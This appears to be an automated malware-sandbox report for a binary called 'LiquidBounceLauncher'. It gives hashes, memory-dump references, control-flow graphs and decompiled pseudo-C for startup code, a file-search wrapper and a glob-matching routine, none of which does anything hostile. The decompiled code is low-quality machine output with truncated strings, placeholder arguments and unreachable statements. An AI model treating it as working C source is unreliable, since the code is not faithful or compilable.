                                                                                                                                                                                      • Instruction ID: 5c06900bd72ea8ac47a9a50c4a00e6bac3acb919529f18a60c3fe08fd858c2fd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 49a10ee56c2eecd6a4ce905f8a72bd3ab17cb198cc1959d3cc9b67b8c3af97bd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 86115EB0A057108AD3007F79A51525EBEF4EB40388F81853FD88467766EB7CD84C8B9B
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004291F0 Relevance: 12.1, APIs: 8, Instructions: 64fileCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 664 4291f0-429212 FindFirstFileA 665 429214-42921f 664->665 666 42926e-42927f _errno GetLastError 664->666 667 429233-42923f 665->667 668 4292b2-4292bd _errno 666->668 669 429281-42928c _errno 666->669 670 429221-429230 667->670 671 429241-42924a 667->671 674 429253-42925d 668->674 672 4292a5-4292b0 _errno 669->672 673 42928e-429296 _errno 669->673 670->667 675 429260-42926d 671->675 676 42924c 671->676 672->674 673->674 677 429298-4292a3 _errno 673->677 676->674 677->674
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _errno$ErrorFileFindFirstLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2068755524-0
                                                                                                                                                                                      • Opcode ID: df9ab3b089e42e85b99c3837e230caf84befe69d2a0c8e19520527bea3019630
                                                                                                                                                                                      • Instruction ID: f87f8e18e25fe2ee88690562fcfc1cf4aba288d173b7b5c41b8ca6b52bcb4c5a
                                                                                                                                                                                      • Opcode Fuzzy Hash: df9ab3b089e42e85b99c3837e230caf84befe69d2a0c8e19520527bea3019630
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7311C370604321DADB14AF65F8816AA77A09F46305FD48DBBE4548E242D23C8C89D3BA
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004011B0 Relevance: 12.1, APIs: 8, Instructions: 59COMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      C-Code - Quality: 44%
                                                                                                                                                                                      			E004011B0(intOrPtr __ebx, void* __ecx, void* __edi, void* __esi) {
				char _v20;
				intOrPtr _v24;
				void* _v28;
				char _v44;
				char _v48;
				char* _v72;
				signed int _v76;
				intOrPtr _v80;
				char* _v84;
				intOrPtr* _t18;
				intOrPtr _t21;
				intOrPtr* _t24;
				intOrPtr* _t26;
				void* _t30;
				signed int _t32;
				char* _t34;
				void* _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t45;
				void* _t48;
				void* _t49;
				signed int _t50;
				signed int _t51;
				void* _t58;

				_t45 = __esi;
				_t44 = __edi;
				_t42 = __ecx;
				_t40 = __ebx;
				_push(__ebx);
				_t49 = _t48 - 0x14;
				_t18 =  *0x4d90ac; // 0x41ff30
				if(_t18 != 0) {
					_v20 = 0;
					_v24 = 2;
					_v28 = 0;
					 *_t18();
					_t49 = _t49 - 0xc;
				}
				_v28 = E00401000; // executed
				SetUnhandledExceptionFilter(??); // executed
				_t50 = _t49 - 4;
				L0041FD30(_t42);
				_t21 =  *0x4d2984; // 0xfffffffd
				 *_t50 = _t21;
				E00424940(); // executed
				E0041F990(); // executed
				_t24 = "iticalSection";
				if(_t24 != 0) {
					_t40 = __imp___iob;
					 *0x4d2988 = _t24;
					_v28 = _t24;
					 *_t50 =  *((intOrPtr*)(_t40 + 0x10));
					L004164B0();
					_v28 = "iticalSection";
					 *_t50 =  *((intOrPtr*)(_t40 + 0x30));
					L004164B0();
					_v28 = "iticalSection";
					_t24 =  *((intOrPtr*)(_t40 + 0x50));
					 *_t50 = _t24;
					L004164B0();
				}
				L004164C0();
				_t43 =  *0x4d2988; // 0x4000
				 *_t24 = _t43;
				E00420340(_t40, _t44, _t45);
				_t51 = _t50 & 0xfffffff0;
				_t26 = L0041FEC0();
				L004164C8();
				_v24 =  *_t26;
				_v28 = "oseHandle";
				 *_t51 =  *0x519004; // executed
				_t30 = E004B09BC(_t43, _t51, _t58); // executed
				L004164B8();
				 *_t51 = _t30;
				ExitProcess(??);
				_v84 = "oseHandle";
				 *((intOrPtr*)(_t51 - 0x3c)) = 0x519004;
				_v44 = 0;
				_v72 =  &_v44;
				_t32 =  *0x4d2980; // 0x2
				_v76 = _t32 & 0x00000001;
				_t34 =  &_v48;
				_v80 = _t34;
				L004164D0();
				return _t34;
			}




























                                                                                                                                                                                      0x004011b0
                                                                                                                                                                                      0x004011b0
                                                                                                                                                                                      0x004011b0
                                                                                                                                                                                      0x004011b0
                                                                                                                                                                                      0x004011b3
                                                                                                                                                                                      0x004011b4
                                                                                                                                                                                      0x004011b7
                                                                                                                                                                                      0x004011be
                                                                                                                                                                                      0x004011c0
                                                                                                                                                                                      0x004011c8
                                                                                                                                                                                      0x004011d0
                                                                                                                                                                                      0x004011d7
                                                                                                                                                                                      0x004011d9
                                                                                                                                                                                      0x004011d9
                                                                                                                                                                                      0x004011dc
                                                                                                                                                                                      0x004011e3
                                                                                                                                                                                      0x004011e8
                                                                                                                                                                                      0x004011eb
                                                                                                                                                                                      0x004011f0
                                                                                                                                                                                      0x004011f5
                                                                                                                                                                                      0x004011f8
                                                                                                                                                                                      0x004011fd
                                                                                                                                                                                      0x00401202
                                                                                                                                                                                      0x00401209
                                                                                                                                                                                      0x0040120b
                                                                                                                                                                                      0x00401211
                                                                                                                                                                                      0x00401216
                                                                                                                                                                                      0x0040121d
                                                                                                                                                                                      0x00401220
                                                                                                                                                                                      0x0040122a
                                                                                                                                                                                      0x00401231
                                                                                                                                                                                      0x00401234
                                                                                                                                                                                      0x0040123e
                                                                                                                                                                                      0x00401242
                                                                                                                                                                                      0x00401245
                                                                                                                                                                                      0x00401248
                                                                                                                                                                                      0x00401248
                                                                                                                                                                                      0x0040124d
                                                                                                                                                                                      0x00401252
                                                                                                                                                                                      0x00401258
                                                                                                                                                                                      0x0040125a
                                                                                                                                                                                      0x0040125f
                                                                                                                                                                                      0x00401262
                                                                                                                                                                                      0x00401267
                                                                                                                                                                                      0x0040126e
                                                                                                                                                                                      0x00401277
                                                                                                                                                                                      0x00401280
                                                                                                                                                                                      0x00401283
                                                                                                                                                                                      0x0040128a
                                                                                                                                                                                      0x0040128f
                                                                                                                                                                                      0x00401292
                                                                                                                                                                                      0x004012a7
                                                                                                                                                                                      0x004012af
                                                                                                                                                                                      0x004012b6
                                                                                                                                                                                      0x004012be
                                                                                                                                                                                      0x004012c2
                                                                                                                                                                                      0x004012ca
                                                                                                                                                                                      0x004012ce
                                                                                                                                                                                      0x004012d2
                                                                                                                                                                                      0x004012d6
                                                                                                                                                                                      0x004012de

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _setmode$ExceptionExitFilterProcessUnhandled__p__environ__p__fmode_cexit
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3476844589-0
                                                                                                                                                                                      • Opcode ID: ab4fc5b0b95fd4ba69791664919651f1b20baa2f8d6d8d132519fe82ba35560f
                                                                                                                                                                                      • Instruction ID: 4b2fddbd878db993fe5c62bd93f136df5ef92578646723fe7d51171ad71cc13d
                                                                                                                                                                                      • Opcode Fuzzy Hash: ab4fc5b0b95fd4ba69791664919651f1b20baa2f8d6d8d132519fe82ba35560f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 63211DB46057008FC700FF75D98565ABBE0BB48714F41882EF88887352E738E888DB5A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00428410 Relevance: 40.9, APIs: 22, Strings: 1, Instructions: 645stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      C-Code - Quality: 27%
                                                                                                                                                                                      			E00428410(signed int __eax, intOrPtr* __ecx, signed int __edx, intOrPtr _a4) {
				void* _v16;
				void _v32;
				signed int* _v36;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr* _v64;
				int _v68;
				signed int* _v72;
				void* _v76;
				int _v80;
				signed int* _v84;
				intOrPtr _v88;
				signed int* _v92;
				signed int _v96;
				signed int _v97;
				char _v112;
				int _v116;
				int _v120;
				signed int* _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t229;
				signed int _t231;
				signed int _t239;
				signed int _t241;
				void* _t249;
				signed int _t250;
				signed int _t252;
				signed char* _t255;
				signed int _t256;
				signed int _t257;
				signed int* _t260;
				signed int _t261;
				int* _t263;
				signed int _t267;
				signed int* _t272;
				void* _t278;
				signed int _t294;
				signed int _t304;
				signed int _t308;
				void* _t311;
				int _t313;
				signed int _t324;
				signed int _t330;
				signed int _t336;
				signed int* _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t341;
				int _t342;
				signed int* _t343;
				void** _t346;
				signed int _t349;
				signed char* _t350;
				signed int _t352;
				signed int _t353;
				intOrPtr _t354;
				signed int _t355;
				int _t357;
				char* _t358;
				void* _t361;
				char* _t363;
				signed int* _t367;
				signed int* _t369;
				signed char* _t372;
				signed char* _t374;
				signed int _t377;
				signed int _t380;
				void* _t382;
				signed int _t384;
				signed char* _t386;
				intOrPtr _t388;
				signed int* _t393;
				signed int _t394;
				char* _t396;
				signed int _t399;
				intOrPtr* _t400;
				signed int* _t401;
				signed int* _t402;
				signed int _t403;
				signed int _t405;
				signed int _t406;
				signed int _t408;
				signed int* _t409;
				signed int _t410;
				signed int* _t411;
				signed int _t412;
				void* _t413;
				signed int* _t414;
				signed int _t415;
				intOrPtr _t416;
				signed int _t417;
				signed int* _t419;
				void* _t420;
				signed int* _t421;
				intOrPtr* _t422;
				signed int* _t425;
				intOrPtr* _t427;
				signed int* _t429;
				intOrPtr* _t430;
				signed int* _t431;
				intOrPtr* _t432;
				void* _t439;

				_t336 = __eax;
				_t421 = _t420 - 0x6c;
				_v52 = __edx;
				_v64 = __ecx;
				if((__edx & 0x00000004) != 0) {
					_v68 = _t421;
					 *_t421 = __eax;
					_t422 = _t421 - E00420510(strlen(??) + 0x10 >> 4 << 4);
					_t405 = _t336;
					_t220 =  &_v112;
					_t393 = _t220;
					_v60 = _t220;
					_t221 =  *_t336 & 0x000000ff;
					L53:
					while(1) {
						if(_t221 == 0x7f) {
							L58:
							_t222 =  *(_t405 + 1) & 0x000000ff;
							 *_t393 = 0x7f;
							if(_t222 != 0) {
								_t393[0] = _t222;
								_t405 = _t405 + 2;
								_t221 =  *_t405 & 0x000000ff;
								_t393 =  &(_t393[0]);
								continue;
							}
							_t393 =  &(_t393[0]);
							_t405 = _t405 + 1;
							L55:
							_t369 =  &(_t393[0]);
							_t95 = _t405 + 1; // -1
							_t353 = _t95;
							 *_t393 = _t222;
							if(_t222 == 0 || _t222 == 0x7b) {
								if(_t222 == 0x7b) {
									_v56 = _t369;
									_t394 = _t353;
									do {
										L61:
										_t367 = _v56;
										_t349 = 1;
										while(1) {
											_t223 =  *(_t394 + 1) & 0x000000ff;
											if(_t223 == 0x7f) {
												goto L69;
											}
											L63:
											_t394 = _t394 + 1;
											L64:
											if(_t223 == 0x7d || _t223 == 0x2c && _t349 == 1) {
												_t349 = _t349 - 1;
												if(_t349 == 0) {
													if(_t223 != 0x2c) {
														_t225 = _t394;
														goto L90;
													}
													goto L80;
												}
												 *_t367 = _t223;
												_t223 =  *(_t394 + 1) & 0x000000ff;
												_t367 =  &(_t367[0]);
												if(_t223 != 0x7f) {
													goto L63;
												}
											} else {
												if(_t223 == 0x7b) {
													_t349 = _t349 + 1;
													_t338 = 1;
													_v48 = 1;
												} else {
													_v48 = _t223 != 0;
													_t338 = _v48 & 0x000000ff;
												}
												_t409 =  &(_t367[0]);
												 *_t367 = _t223;
												if(_t338 == 0) {
													if(_v48 == 0) {
														L71:
														_v56 = 1;
														L99:
														L51:
														return _v56;
													}
													_t367 = _t409;
													if(_t223 != 0x2c) {
														L98:
														 *_t367 = 0;
														_v56 = 1;
														goto L99;
													}
													L80:
													_t231 = _t394;
													_t408 = 1;
													goto L81;
													do {
														do {
															while(1) {
																L81:
																_t339 =  *(_t231 + 1) & 0x000000ff;
																_t114 = _t231 + 1; // -3
																_t352 = _t114;
																if(_t339 != 0x7f) {
																	goto L108;
																}
																L82:
																if( *((char*)(_t231 + 2)) != 0) {
																	while(1) {
																		_t339 =  *(_t352 + 2) & 0x000000ff;
																		_t118 = _t352 + 2; // 0x1
																		_t231 = _t118;
																		if(_t339 != 0x7f) {
																			break;
																		}
																		if( *(_t231 + 1) == 0) {
																			goto L98;
																		}
																		_t352 = _t231;
																	}
																	L87:
																	if(_t339 == 0x7b) {
																		_t408 = _t408 + 1;
																		L81:
																		_t339 =  *(_t231 + 1) & 0x000000ff;
																		_t114 = _t231 + 1; // -3
																		_t352 = _t114;
																		if(_t339 != 0x7f) {
																			goto L108;
																		}
																		goto L82;
																	}
																	if(_t339 != 0x7d) {
																		break;
																	}
																	goto L89;
																}
																goto L98;
																L108:
																_t231 = _t352;
																goto L87;
															}
														} while (_t339 != 0);
														goto L98;
														L89:
														_t408 = _t408 - 1;
													} while (_t408 != 0);
													L90:
													_t119 = _t225 + 1; // 0x2
													_t350 = _t119;
													_t226 =  *(_t225 + 1) & 0x000000ff;
													while(1) {
														_t367 =  &(_t367[0]);
														_t350 =  &(_t350[1]);
														 *(_t367 - 1) = _t226;
														if(_t226 == 0) {
															break;
														}
														_t226 =  *_t350 & 0x000000ff;
													}
													 *_t422 = _a4;
													_t406 = _v52;
													_t229 = E00428410(_v60, _v64, _t406);
													_v52 = _t406 | 0x00000001;
													if(_t229 == 1) {
														goto L71;
													}
													break;
												} else {
													_t367 = _t409;
													_t223 =  *(_t394 + 1) & 0x000000ff;
													if(_t223 == 0x7f) {
														goto L69;
													}
													goto L63;
												}
											}
											L69:
											_t224 =  *(_t394 + 2) & 0x000000ff;
											 *_t367 = 0x7f;
											_t337 =  &(_t367[0]);
											_t367[0] = _t224;
											if(_t224 != 0) {
												_t223 =  *(_t394 + 3) & 0x000000ff;
												_t367 = _t337;
												_t394 = _t394 + 3;
												goto L64;
											}
											_t367[0] = 0;
											goto L71;
										}
									} while ( *_t394 == 0x2c);
									_v56 = _t229;
									goto L99;
								}
								_t421 = _v68;
								goto L1;
							} else {
								_t222 =  *(_t405 + 1) & 0x000000ff;
								_t393 = _t369;
								_t405 = _t353;
								if(_t222 != 0x7f) {
									goto L54;
								}
								goto L58;
							}
						}
						L54:
						if(_t222 == 0x7b) {
							_v56 = _t393;
							_t394 = _t405;
							goto L61;
						}
						goto L55;
					}
				}
				L1:
				_v92 = _t421;
				 *_t421 = _t336;
				_t4 = strlen(??) + 1; // 0x1
				_t425 = _t421 - E00420510(_t232 + 0x10 >> 4 << 4);
				_v116 = _t4;
				_v120 = _t336;
				 *_t425 =  &_v112;
				 *_t425 = memcpy(??, ??, ??); // executed
				_t239 = E00428DF0(_t238); // executed
				_v48 = _t239;
				_t410 = _t239;
				_v32 = 0;
				_t241 = L00427E10( &_v44);
				_v56 = _t241;
				if(_t241 != 0) {
					L50:
					goto L51;
				}
				_t395 = _v52;
				if(L00427D70(_t410, _v52) == 0) {
					_t411 = _t425;
					 *_t425 = _v48;
					_t249 = E00420510(strlen(??) + 0x10 >> 4 << 4);
					_t372 = _v48;
					_t427 = _t425 - _t249;
					_t396 =  &_v112;
					_t354 = _t396;
					do {
						_t250 =  *_t372 & 0x000000ff;
						if(_t250 == 0x7f) {
							_t250 = _t372[1] & 0x000000ff;
							_t372 =  &(_t372[1]);
						}
						_t354 = _t354 + 1;
						_t372 =  &(_t372[1]);
						 *(_t354 - 1) = _t250;
					} while (_t250 != 0);
					 *_t427 = _t396;
					L0042F6F8();
					_t425 = _t411;
					if(_t250 == 0) {
						_v56 = 1;
						goto L50;
					}
					_v56 = E00428360(_t250,  &_v44);
					goto L4;
				} else {
					 *_t425 =  &_v44;
					_v56 = E00428410(_t410, _v64, _t395 | 0x00000080);
					L4:
					_t355 = _v56;
					if(_t355 != 0) {
						goto L50;
					}
					_t252 =  *(_t336 + 1) & 0x000000ff;
					if(_t252 == 0x2f) {
						L8:
						 *_t425 = _v48;
						_t255 = strlen(??) + _t336;
						if(_t336 >= _t255) {
							_t336 =  *_t255 & 0x000000ff;
							_v60 = _t255;
							_v97 = _t336;
							L16:
							_t256 = _v97 & 0x000000ff;
							if(_t256 == 0x2f || _t256 == 0x5c) {
								_t374 = _v60;
								_t412 = _v97 & 0x000000ff;
								while(1) {
									_t374 =  &(_t374[1]);
									_t257 =  *_t374 & 0x000000ff;
									_t355 = _t355 & 0xffffff00 | _t257 == 0x0000005c;
									_t336 = _t336 & 0xffffff00 | _t257 == 0x0000002f | _t355;
									if(_t336 == 0) {
										break;
									}
									_t412 = _t257;
								}
								_v60 = _t374;
								_v97 = _t412;
								_v96 = _v48;
								goto L22;
							} else {
								_v97 = 0x5c;
								_v96 = _v48;
								L22:
								_t260 = _v36;
								_v56 = 2;
								_v72 = _t260;
								_t261 =  *_t260;
								_v48 = _v52 & 0x00008000;
								if(_t261 == 0) {
									L124:
									 *_t425 = _v72;
									free(??);
									goto L51;
								} else {
									goto L23;
								}
								while(1) {
									L23:
									 *_t425 = _t261;
									_t263 = E00429370();
									_t399 = _t263;
									if(_t263 == 0) {
										goto L118;
									}
									if(_v96 == 0) {
										_v68 = 0;
									} else {
										 *_t425 =  *_v72;
										_v68 = strlen(??);
									}
									_v76 = 0;
									_v88 = _v68 + 2;
									while(1) {
										L27:
										 *_t425 = _t399;
										_t278 = E00429530();
										_t413 = _t278;
										if(_t278 == 0) {
											break;
										}
										if(_v48 == 0 ||  *((intOrPtr*)(_t413 + 8)) == 0x10) {
											_t50 = _t413 + 0xc; // 0xc
											_t342 = _t50;
											if(E00428140(_v60, _v52, _t342) != 0) {
												continue;
											}
											_t377 =  *(_t413 + 6) & 0x0000ffff;
											_v84 = _t425;
											_t429 = _t425 - E00420510(_t377 + _v88 + 0xf >> 4 << 4);
											_v80 = 0;
											_t415 =  &_v112;
											if(_v68 != 0) {
												_v80 = _t377;
												 *_t429 = _t415;
												_v116 = _v68;
												_v120 =  *_v72;
												memcpy(??, ??, ??);
												_t357 = _v68;
												_t377 = _v80;
												_t294 =  *(_t429 + _t357 + 0xb) & 0x000000ff;
												if(_t294 == 0x2f || _t294 == 0x5c) {
													_v80 = _v68;
												} else {
													_v80 = _t357 + 1;
													 *((char*)(_t415 + _t357)) = _v97 & 0x000000ff;
												}
											}
											_v120 = _t342;
											_v116 = _t377 + 1;
											_t343 = _t429;
											 *_t429 = _v80 + _t415;
											memcpy(??, ??, ??);
											 *_t429 = _t415;
											_t430 = _t429 - E00420510(strlen(??) + 0x10 >> 4 << 4);
											_t304 = _t415;
											_t358 =  &_v112;
											_t416 = _t358;
											while(1) {
												L34:
												_t380 =  *_t304 & 0x000000ff;
												if(_t380 == 0x7f) {
													break;
												}
												_t416 = _t416 + 1;
												_t304 = _t304 + 1;
												 *(_t416 - 1) = _t380;
												if(_t380 == 0) {
													L36:
													 *_t430 = _t358;
													L0042F6F8();
													_t417 = _t304;
													_t431 = _t343;
													if(_t304 == 0) {
														_v56 = 3;
														L117:
														_t425 = _v84;
														goto L27;
													}
													_t308 = _v52;
													_v56 = _v56 & ((_t304 & 0xffffff00 | _v56 == 0x00000002) & 0x000000ff) - 0x00000001;
													if((_t308 & 0x00000040) != 0) {
														if(_a4 != 0) {
															E00428360(_t417, _a4);
														}
														goto L117;
													}
													_t346 = _v76;
													if(_t346 == 0) {
														 *_t431 = 0xc;
														_t311 = malloc(??);
														if(_t311 == 0) {
															goto L117;
														}
														 *(_t311 + 8) = _t417;
														 *(_t311 + 4) = 0;
														 *_t311 = 0;
														L133:
														_v76 = _t311;
														goto L117;
													}
													_v80 = _t399;
													_t403 = _t308 & 0x00004000;
													while(1) {
														_t313 = _t346[2];
														 *_t431 = _t417;
														_v120 = _t313;
														if(_t403 != 0) {
															goto L40;
														}
														L44:
														L0042F6F0();
														_t382 =  *_t346;
														_t361 = _t346[1];
														if(_t313 > 0) {
															L41:
															if(_t361 == 0) {
																L46:
																_t399 = _v80;
																_v80 = _t313;
																 *_t431 = 0xc;
																_t311 = malloc(??);
																if(_t311 == 0) {
																	goto L117;
																}
																 *(_t311 + 8) = _t417;
																 *(_t311 + 4) = 0;
																 *_t311 = 0;
																if(_v80 <= 0) {
																	 *_t346 = _t311;
																	if(_v76 != 0) {
																		goto L117;
																	}
																	goto L133;
																}
																_t346[1] = _t311;
																goto L117;
															}
															L42:
															_t346 = _t361;
															_t313 = _t346[2];
															 *_t431 = _t417;
															_v120 = _t313;
															if(_t403 != 0) {
																goto L40;
															}
															goto L44;
														}
														L45:
														_t361 = _t382;
														if(_t361 != 0) {
															goto L42;
														}
														goto L46;
														L40:
														_t313 = strcoll();
														_t382 =  *_t346;
														if(_t313 <= 0) {
															goto L45;
														}
														goto L41;
													}
												}
											}
											_t384 =  *(_t304 + 1) & 0x000000ff;
											_t416 = _t416 + 1;
											_t304 = _t304 + 2;
											 *(_t416 - 1) = _t384;
											if(_t384 != 0) {
												goto L34;
											}
											goto L36;
										} else {
											continue;
										}
									}
									 *_t425 = _t399;
									E00429580();
									if(_v76 != 0) {
										E004283C0(_v76, _a4);
									}
									L113:
									_t401 = _v72;
									_t341 = _t401 + 4;
									 *_t425 =  *(_t341 - 4);
									free(??);
									_t261 =  *(_t401 + 4);
									if(_t261 == 0) {
										L134:
										_v72 = _v36;
										goto L124;
									}
									if(_v56 == 1) {
										L121:
										_t267 = _v72[1];
										do {
											_t341 =  &(_t341[1]);
											 *_t425 = _t267;
											free(??);
											_t267 =  *_t341;
										} while (_t267 != 0);
										L123:
										_v56 = 1;
										_v72 = _v36;
										goto L124;
									}
									_v72 = _t341;
									continue;
									L118:
									if((_v52 & 0x00000004) == 0) {
										_t400 = _v64;
										if(_t400 == 0) {
											goto L113;
										}
										L0042F598();
										_v120 =  *_t263;
										_t414 = _v72;
										 *_t425 =  *_t414;
										if( *_t400() == 0) {
											goto L113;
										}
										_t272 = _t414;
										_t341 =  &(_t414[1]);
										_t402 = _t414;
										L120:
										 *_t425 =  *_t272;
										free(??);
										if(_t402[1] == 0) {
											goto L123;
										}
										goto L121;
									}
									_t402 = _v72;
									_t341 =  &(_t402[1]);
									_t272 = _t402;
									goto L120;
								}
							}
						}
						_t355 =  *_t255 & 0x000000ff;
						_v97 = _t355;
						if(_t355 == 0x2f || _t355 == 0x5c) {
							_v60 = _t255;
						} else {
							while(1) {
								_t22 = _t255 - 1; // -2
								_t386 = _t22;
								if(_t336 == _t386) {
									break;
								}
								_t355 =  *(_t255 - 1) & 0x000000ff;
								_t255 = _t386;
								if(_t355 == 0x2f || _t355 == 0x5c) {
									_v60 = _t386;
									_v97 = _t355;
									goto L16;
								} else {
									continue;
								}
							}
							_v60 = _t386;
							_v97 =  *(_t255 - 1) & 0x000000ff;
						}
						goto L16;
					}
					_t439 = _t252 - 0x5c;
					if(_t439 == 0) {
						goto L8;
					}
					_t355 = 2;
					asm("repe cmpsb");
					if(_t439 == 0) {
						if((_v52 & 0x00000010) != 0) {
							_t324 = L00427D70(_t336, _v52);
							_v56 = _t324;
							if(_t324 != 0) {
								goto L110;
							}
							 *_t425 = _t336;
							_t419 = _t425;
							_t432 = _t425 - E00420510(strlen(??) + 0x10 >> 4 << 4);
							_t363 =  &_v112;
							_t388 = _t363;
							do {
								_t330 =  *_t336 & 0x000000ff;
								if(_t330 == 0x7f) {
									_t330 =  *(_t336 + 1) & 0x000000ff;
									_t336 = _t336 + 1;
								}
								_t388 = _t388 + 1;
								_t336 = _t336 + 1;
								 *(_t388 - 1) = _t330;
							} while (_t330 != 0);
							 *_t432 = _t363;
							L0042F6F8();
							_t425 = _t419;
							if(_t330 == 0 || _a4 == 0) {
								goto L134;
							} else {
								E00428360(_t330, _a4);
								_v72 = _v36;
								goto L124;
							}
						}
						L110:
						_v60 = _t336;
						_v97 = 0x5c;
						_v96 = 0;
						goto L22;
					}
					goto L8;
				}
			}

















































































































                                                                                                                                                                                      0x00428416
                                                                                                                                                                                      0x00428418
                                                                                                                                                                                      0x0042841b
                                                                                                                                                                                      0x00428421
                                                                                                                                                                                      0x00428424
                                                                                                                                                                                      0x00428780
                                                                                                                                                                                      0x00428783
                                                                                                                                                                                      0x00428799
                                                                                                                                                                                      0x0042879b
                                                                                                                                                                                      0x0042879d
                                                                                                                                                                                      0x004287a1
                                                                                                                                                                                      0x004287a3
                                                                                                                                                                                      0x004287a6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004287a9
                                                                                                                                                                                      0x004287ab
                                                                                                                                                                                      0x004287d5
                                                                                                                                                                                      0x004287d5
                                                                                                                                                                                      0x004287d9
                                                                                                                                                                                      0x004287de
                                                                                                                                                                                      0x00428890
                                                                                                                                                                                      0x00428893
                                                                                                                                                                                      0x00428896
                                                                                                                                                                                      0x00428899
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428899
                                                                                                                                                                                      0x004287e4
                                                                                                                                                                                      0x004287e7
                                                                                                                                                                                      0x004287b1
                                                                                                                                                                                      0x004287b3
                                                                                                                                                                                      0x004287b6
                                                                                                                                                                                      0x004287b6
                                                                                                                                                                                      0x004287b9
                                                                                                                                                                                      0x004287bb
                                                                                                                                                                                      0x00428c7f
                                                                                                                                                                                      0x00428c89
                                                                                                                                                                                      0x00428c8c
                                                                                                                                                                                      0x004287f5
                                                                                                                                                                                      0x004287f5
                                                                                                                                                                                      0x004287f5
                                                                                                                                                                                      0x004287f8
                                                                                                                                                                                      0x004287fd
                                                                                                                                                                                      0x004287fd
                                                                                                                                                                                      0x00428803
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428805
                                                                                                                                                                                      0x00428805
                                                                                                                                                                                      0x00428808
                                                                                                                                                                                      0x0042880a
                                                                                                                                                                                      0x00428815
                                                                                                                                                                                      0x00428818
                                                                                                                                                                                      0x004288a3
                                                                                                                                                                                      0x0042896a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0042896a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004288a3
                                                                                                                                                                                      0x0042881e
                                                                                                                                                                                      0x00428820
                                                                                                                                                                                      0x00428824
                                                                                                                                                                                      0x00428829
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428850
                                                                                                                                                                                      0x00428852
                                                                                                                                                                                      0x00428880
                                                                                                                                                                                      0x00428883
                                                                                                                                                                                      0x00428888
                                                                                                                                                                                      0x00428854
                                                                                                                                                                                      0x00428856
                                                                                                                                                                                      0x0042885a
                                                                                                                                                                                      0x0042885a
                                                                                                                                                                                      0x00428860
                                                                                                                                                                                      0x00428863
                                                                                                                                                                                      0x00428865
                                                                                                                                                                                      0x00428c68
                                                                                                                                                                                      0x00428840
                                                                                                                                                                                      0x00428840
                                                                                                                                                                                      0x0042895a
                                                                                                                                                                                      0x00428773
                                                                                                                                                                                      0x0042877d
                                                                                                                                                                                      0x0042877d
                                                                                                                                                                                      0x00428c70
